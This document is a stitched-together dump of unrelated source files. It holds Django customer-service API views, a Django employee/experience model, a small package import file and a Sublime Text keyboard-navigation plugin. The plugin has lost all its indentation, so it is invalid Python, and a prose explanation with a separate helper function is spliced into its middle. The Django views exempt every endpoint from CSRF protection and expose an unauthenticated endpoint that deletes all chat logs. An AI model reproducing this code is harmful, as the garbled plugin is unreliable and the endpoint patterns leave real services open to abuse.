        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['c_email']
        instance = CustomerService.objects.get(email=data_email)
        instance_admin = instance.enterprise
        json_send = {'email': instance.email, 'nickname': instance.nickname, 'admin_nickname': instance_admin.nickname}
        return JsonResponse(json_send, status=200)


@csrf_exempt
def customerservice_update_connection_num(request):
    if request.method == 'POST':
        # CustomerService: connection_num
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_update_connection_num_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['c_email']
        instance = CustomerService.objects.get(email=data_email)
        instance.connection_num = json_receive['connection_num']
        instance.save()
        return HttpResponse('OK', status=200)
@csrf_exempt
def customerservice_update_login_status(request):
    if request.method == 'POST':
        # CustomerService: login_status
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_update_login_status_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['c_email']
        instance = CustomerService.objects.get(email=data_email)
        instance.is_online = json_receive['login_status']
        instance.save()
        return HttpResponse('OK', status=200)


@csrf_exempt
def customerservice_setrobotinfo_create(request):
    if request.method == 'POST':
        # RobotInfo: question answer keyword weight
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_setrobotinfo_create_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['c_email']
        instance_customerservice = CustomerService.objects.get(email=data_email)
        json_receive['enterprise'] = instance_customerservice.enterprise.id
        serializer = RobotInfoSerializer(data=json_receive)
        if serializer.is_valid():
            serializer.save()
            robot_add_keyword(json_receive['keyword'])
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def customerservice_setrobotinfo_delete(request):
    if request.method == 'POST':
        # RobotInfo: question
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_setrobotinfo_delete_check(json_receive, request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['c_email']
        instance_customerservice = CustomerService.objects.get(email=data_email)
        data_enterprise = instance_customerservice.enterprise
        instance_robotinfo = RobotInfo.objects.filter(enterprise=data_enterprise, question=json_receive['question'])
        instance_robotinfo.delete()
        return HttpResponse('OK', status=200)


@csrf_exempt
def customerservice_setrobotinfo_show(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = customerservice_setrobotinfo_show_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        data_email = request.session['c_email']
        instance_customerservice = CustomerService.objects.get(email=data_email)
        data_enterprise = instance_customerservice.enterprise
        instance_alldata = RobotInfo.objects.filter(enterprise=data_enterprise)
        json_send = list()
        for i in instance_alldata:
            json_send.append({'question': i.question, 'answer': i.answer, 'keyword': i.keyword, 'weight': i.weight})
        return JsonResponse(json_send, safe=False, status=200)


@csrf_exempt
def customerservice_displayrobotreply_show(request):
    if request.method == 'POST':
        # CustomerService: nickname customer_input
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customerservice_displayrobotreply_show_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance_admin = Admin.objects.get(nickname=json_receive['nickname'])
        admin_id = instance_admin.id
        answer = robot_return_answer(admin_id, json_receive['customer_input'])
        return HttpResponse(answer, status=200)


@csrf_exempt
def customerservice_logout(request):
    if request.method == 'POST':
        # no json
        is_correct, error_message = customerservice_logout_check(request)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance = CustomerService.objects.get(email=request.session['c_email'])
        instance.is_online = False
        instance.save()
        del request.session['c_email']
        return HttpResponse('OK', status=200)
@csrf_exempt
def chattinglog_send_message(request):
    if request.method == 'POST':
        # client_id service_id content is_client
        json_receive = JSONParser().parse(request)
        serializer = ChattingLogSerializer(data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return JsonResponse(serializer.data, status=200)
        return JsonResponse(serializer.errors, status=201)


@csrf_exempt
def chattinglog_delete_record(request):
    if request.method == 'POST':
        chattinglogs = ChattingLog.objects.all()
        if chattinglogs.exists():
            chattinglogs.delete()
            return HttpResponse('Clear', status=200)
        else:
            return HttpResponse('No data to be Clear.', status=201)


@csrf_exempt
def chattinglog_delete_record_ontime(request):
    if request.method == 'POST':
        # now = timezone.now()
        # end_date = datetime(now.year, now.month, now.day, 0, 0)
        end_date = timezone.now()
        start_date = end_date + timedelta(days=-100)
        chattinglogs = ChattingLog.objects.exclude(time__range=(start_date, end_date))
        if chattinglogs.exists():
            chattinglogs.delete()
            return HttpResponse('Clear', status=200)
        else:
            return HttpResponse('No data to be Clear.', status=201)


@csrf_exempt
def chattinglog_get_cs_id(request):
    if request.method == 'POST':
        # nickname
        json_receive = JSONParser().parse(request)
        instance = CustomerService.objects.filter(nickname=json_receive['nickname'])
        if instance.exists() == False:
            return HttpResponse('robot', status=200)
        else:
            return HttpResponse(instance[0].id, status=200)


@csrf_exempt
def bigimagelog_send_image(request):
    if request.method == 'POST':
        # bigimagelog: client_id service_id image is_client label
        json_receive = JSONParser().parse(request)
        json_receive['time'] = timezone.now()
        ext_position1 = json_receive['image'].index('data:image/')
        ext_position2 = json_receive['image'].index(';base64,')
        json_receive['extention'] = json_receive['image'][ext_position1 + 11:ext_position2]
        serializer = BigImageLogSerializer(data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def bigimagelog_show_single_history(request):
    if request.method == 'POST':
        # bigimagelog: client_id service_id label
        json_receive = JSONParser().parse(request)
        instances = BigImageLog.objects.filter(client_id=json_receive['client_id'], service_id=json_receive['service_id'], label=json_receive['label'])
        if instances.exists():
            f = open('./media/' + instances[0].image.url, 'rb')
            ls_f = 'data:image/' + instances[0].extention + ';base64,' + base64.b64encode(f.read()).decode('utf-8')
            f.close()
            return HttpResponse(ls_f, status=200)
        return HttpResponse('ERROR, no history.', status=200)
@csrf_exempt
def smallimagelog_send_image(request):
    if request.method == 'POST':
        # smallimagelog: client_id service_id image is_client label
        json_receive = JSONParser().parse(request)
        json_receive['time'] = timezone.now()
        ext_position1 = json_receive['image'].index('data:image/')
        ext_position2 = json_receive['image'].index(';base64,')
        json_receive['extention'] = json_receive['image'][ext_position1 + 11:ext_position2]
        serializer = SmallImageLogSerializer(data=json_receive)
        if serializer.is_valid():
            serializer.save()
            return HttpResponse('OK', status=200)
        return HttpResponse("ERROR, invalid data in serializer.", status=200)


@csrf_exempt
def log_show_history(request):
    if request.method == 'POST':
        # client_id service_id
        json_receive = JSONParser().parse(request)
        instance_customerservice = CustomerService.objects.get(id=json_receive['service_id'])
        instance_enterprise = instance_customerservice.enterprise
        queryset_customerservice = CustomerService.objects.filter(enterprise=instance_enterprise.id)
        cs_list = list()
        for i in queryset_customerservice:
            cs_list.append(i.id)
        queryset_image = SmallImageLog.objects.none()
        queryset_chat = ChattingLog.objects.none()
        for i in cs_list:
            queryset_image = queryset_image | SmallImageLog.objects.filter(client_id=json_receive['client_id'], service_id=i)
            queryset_chat = queryset_chat | ChattingLog.objects.filter(client_id=json_receive['client_id'], service_id=i)
        instance_image = queryset_image.distinct().order_by('time')
        instance_chat = queryset_chat.distinct().order_by('time')
        len_image = len(instance_image)
        pointer_image = 0
        len_chat = len(instance_chat)
        pointer_chat = 0
        json_send = list()
        pointer_image, pointer_chat = log_show_history_while_snippet(json_send, instance_image, instance_chat, len_image, len_chat, pointer_image, pointer_chat)
        log_show_history_if_snippet(json_send, instance_image, instance_chat, len_image, len_chat, pointer_image, pointer_chat)
        return JsonResponse(json_send, safe=False, status=200)


@csrf_exempt
def internal_reset_basic_robot(request):
    if request.method == 'GET':
        robot_basic_read()
        return HttpResponse('Done', status=200)


@csrf_exempt
def customer_check_info(request):
    if request.method == 'POST':
        # customer_info: enterprise_id customer_id cusotmer_name hash_result
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customer_check_info_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        info_enterprise_id = json_receive['enterprise_id']
        info_customer_id = json_receive['customer_id']
        info_cusotmer_name = json_receive['cusotmer_name']
        instance = Admin.objects.get(nickname=info_enterprise_id)
        hash_result = customer_generate_hash_result(info_enterprise_id, info_customer_id, info_cusotmer_name, instance.communication_key)
        if hash_result == json_receive['hash_result']:
            return HttpResponse('True', status=200)
        else:
            return HttpResponse('False', status=200)


@csrf_exempt
def customer_display_customerinfopropertyname(request):
    if request.method == 'POST':
        # enterprise_id
        json_receive = JSONParser().parse(request)
        is_correct, error_message = customer_display_customerinfopropertyname_check(json_receive)
        if is_correct == 0:
            return HttpResponse(error_message, status=200)
        instance_admin = Admin.objects.get(nickname=json_receive['enterprise_id'])
        instance_displayinfo = EnterpriseDisplayInfo.objects.filter(enterprise=instance_admin.id)
        json_send = list()
        for i in instance_displayinfo:
            json_send.append({'name': i.name})
        return JsonResponse(json_send, safe=False, status=200)
# File: Reto_Back_Adrian_Velazquez/ExpLab/models.py
# Repo: Velazquezadrian/hackthatstartup (MIT license)
from django.db import models
class Employee(models.Model):
    first_name = models.CharField(max_length=100)
    last_name = models.CharField(max_length=100)
    email_address = models.EmailField(max_length=100)
    phone_num = models.CharField(max_length=15)
    years_of_experience = models.IntegerField(default=0)
    username = models.CharField(max_length=50, unique=True, primary_key=True)


class Experience(models.Model):
    # The original file repeated these five fields seven times under the same
    # names; in Python only the last assignment of each name takes effect, so
    # the duplicates are collapsed into a single definition per field.
    employee = models.ForeignKey(Employee, on_delete=models.CASCADE)
    organization_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Empresa')
    job_position_one = models.CharField(max_length=100, null=True, blank=True, verbose_name='Posicion')
    description = models.TextField(max_length=500, null=True, blank=True, verbose_name='Descripcion del puesto')
    year = models.PositiveIntegerField(default=0)
    departure = models.CharField(max_length=100, null=True, blank=True, verbose_name='Motivo de la salida')
# File: phcovid/data_extractor/__init__.py
# Repo: kvdomingo/covid19-ph-web (MIT license)
from .arcgis import extract_arcgis_data  # noqa: F401
from .dsph_gsheet import extract_dsph_gsheet_data  # noqa: F401
# File: KeyboardNavigation.py
# Repo: robertcollier4/keyboardmovementSublime (Unlicense)
#---------------------------------------------------------------
class MoveToBegOfContigBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn
whiteChars = (chr(32), chr(9), chr(10), chr(13))
spaceChars = (chr(32), chr(9))
newlineChars = (chr(10), chr(13))
newlineChar = chr(10)
RegionsSelOld = list(view.sel())
view.sel().clear()
for ThisRegion in RegionsSelOld:
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < view.size()) ):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < view.size()) ):
if(boolAtNewline):
break
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().add(sublime.Region(ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if( (ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b) ):
ThisRegionEnd -= 1
view.sel().add(sublime.Region(ThisRegionEnd+1))
view.show(ThisRegionEnd)
# https://ee.hawaii.edu/~tep/EE160/Book/chap4/subsection2.1.1.1.html
class MoveToBegOfSubwordBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if( (ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b) ):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionEnd+1))
view.show(ThisRegionEnd)
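The forward/backward subword scans above can be sketched as a standalone helper on a plain string. This is a hypothetical illustration, independent of the Sublime API; `SUBWORD_DELIMS` mirrors the `chr()` list used in the commands.

```python
# Hypothetical standalone sketch of the subword-boundary scan used above,
# operating on a plain string instead of a Sublime view.
SUBWORD_DELIMS = set(' \t\n\r"#$%&\'=@:?.,+_-<>()[]{}|/\\')

def next_subword_boundary(text, pos, forward=True):
    """Return the offset of the nearest subword boundary from pos."""
    if forward:
        # Scan right until a delimiter or end of text.
        while pos < len(text) and text[pos] not in SUBWORD_DELIMS:
            pos += 1
        return pos
    # Scan left until a delimiter or start of text.
    pos -= 1
    while pos >= 0 and text[pos] not in SUBWORD_DELIMS:
        pos -= 1
    return pos + 1
```

Note that the bounds check comes before the indexing, which is the safe ordering a plain string requires; the Sublime version relies on `view.substr` tolerating out-of-range points.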
#---------------------------------------------------------------
class SelectToBegOfContigBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn
whiteChars = (chr(32), chr(9), chr(10), chr(13))
spaceChars = (chr(32), chr(9))
newlineChars = (chr(10), chr(13))
newlineChar = chr(10)
for ThisRegion in view.sel():
if(ThisRegion.a == ThisRegion.b):
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < view.size()) ):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < view.size()) ):
if(boolAtNewline):
break
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if( (ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b) ):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
elif(ThisRegion.a < ThisRegion.b):
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < view.size()) ):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < view.size()) ):
if(boolAtNewline):
break
ThisRegionEnd += 1
if( (ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b) ):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd > ThisRegionBegin-1) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd > ThisRegionBegin-1) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd > ThisRegionBegin-1) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
else: # ThisRegion.a > ThisRegion.b
if(forward): #forward
boolAtNewline = False
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
else:
while( ((view.substr(ThisRegionEnd) not in spaceChars) or (view.substr(ThisRegionEnd) in newlineChars)) and (ThisRegionEnd < ThisRegionBegin) and (ThisRegionEnd < view.size())):
if(view.substr(ThisRegionEnd) == newlineChar):
boolAtNewline = True
ThisRegionEnd += 1
break
ThisRegionEnd += 1
while( ((view.substr(ThisRegionEnd) in spaceChars) or boolAtNewline) and (ThisRegionEnd < ThisRegionBegin) and (ThisRegionEnd < view.size())):
if(boolAtNewline):
break
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
if( (view.substr(ThisRegionEnd) in newlineChars) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
class SelectToBegOfSubwordBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
if(ThisRegion.a == ThisRegion.b):
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegionBegin)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegionBegin)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
elif(ThisRegion.a < ThisRegion.b):
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
else: # ThisRegion.a > ThisRegion.b
if(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
view.show(ThisRegionEnd+1)
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
class SelectToKnLinelimitCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
for ThisRegion in view.sel():
if(forward): #forward
ThisRegionEnd = view.line(ThisRegion).end()
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.a, ThisRegionEnd))
view.show(ThisRegionEnd)
else: #backward
ThisRegionEnd = view.line(ThisRegion).begin()
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.a, ThisRegionEnd))
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class ExpandSelectionToDelimsCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
ThisRegionEnd = ThisRegion.end()
if( (ThisRegion.begin() != ThisRegionEnd) and (view.substr(ThisRegionBegin) in subwordDelims) ):
ThisRegionBegin -= 1
while( (view.substr(ThisRegionBegin) not in subwordDelims) and (ThisRegionBegin >= 0) ):
ThisRegionBegin -= 1
ThisRegionBegin += 1
if( (ThisRegion.begin() != ThisRegionEnd) and (view.substr(ThisRegionEnd) in subwordDelims) ):
ThisRegionEnd += 1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
class ExpandSelectionToQuotesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 34=" 39='
beginDelims = [chr(34), chr(39)]
endDelims = [chr(34), chr(39)]
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
ThisRegionEnd = ThisRegion.end()
while( (view.substr(ThisRegionBegin) not in beginDelims) and (ThisRegionBegin >= 0)):
ThisRegionBegin -= 1
ThisRegionBegin += 1
while( (view.substr(ThisRegionEnd) not in endDelims) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
class ExpandSelectionToBracketsCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=}
BracketDelims = [chr(60), chr(40), chr(91), chr(123), chr(62), chr(41), chr(93), chr(125)]
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
ThisRegionEnd = ThisRegion.end()
while( (view.substr(ThisRegionBegin) not in BracketDelims) and (ThisRegionBegin >= 0)):
ThisRegionBegin -= 1
ThisRegionBegin += 1
while( (view.substr(ThisRegionEnd) not in BracketDelims) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
class ExpandSelectionToWhitespaceCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn
whiteChars = (chr(32), chr(9), chr(10), chr(13))
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
while( (view.substr(ThisRegionBegin) not in whiteChars) and (ThisRegionBegin >= 0)):
ThisRegionBegin -= 1
ThisRegionBegin += 1
ThisRegionEnd = ThisRegion.end()
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
#---------------------------------------------------------------
class KnLinelimitCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
for ThisRegion in view.sel():
if(forward): #forward
ThisRegionEnd = view.line(ThisRegion).end()
view.sel().clear()
view.sel().add(ThisRegionEnd)
view.show(ThisRegionEnd)
else: #backward
ThisRegionEnd = view.line(ThisRegion).begin()
view.sel().clear()
view.sel().add(ThisRegionEnd)
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class KnIndentCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
RegionsSelOld = list(view.sel())
for ThisRegion in RegionsSelOld:
ThisRegionFullline = KnFullLine(view, ThisRegion)
StrContent = view.substr(ThisRegionFullline)
ListLinesStrContent = StrContent.splitlines(True)
NumLines = len(ListLinesStrContent)
ListLinesStrContentNew = list()
if((NumLines == 0) and forward):
view.replace(edit, ThisRegionFullline, chr(9))
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin()+1))
view.show(ThisRegion.begin()+1)
elif(forward): #forward
for StrThisLine in ListLinesStrContent:
ListLinesStrContentNew.append(chr(9)+StrThisLine)
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin()+1, ThisRegion.end()+NumLines))
view.show(ThisRegion.begin()+1)
else: #backward
NumLinesReplaced = 0
for StrThisLine in ListLinesStrContent:
if(StrThisLine[0] == chr(9)):
NumLinesReplaced += 1
ListLinesStrContentNew.append(StrThisLine[1:])
else:
ListLinesStrContentNew.append(StrThisLine)
if(NumLinesReplaced == 0):
#print("case lines none contain tabs at beginning")
pass
elif( (ThisRegion.begin() == ThisRegionFullline.begin()) and (ListLinesStrContent[0][0] == chr(9)) ):
#print("case line 1: cursor at beginning of line and line contains a tab")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin())
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin(), ThisRegion.end()-NumLinesReplaced+1))
elif(ThisRegion.begin() == ThisRegionFullline.begin()):
#print("case line 1: cursor at beginning of line - don't move selection back at the beginning")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin())
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin(), ThisRegion.end()-NumLinesReplaced))
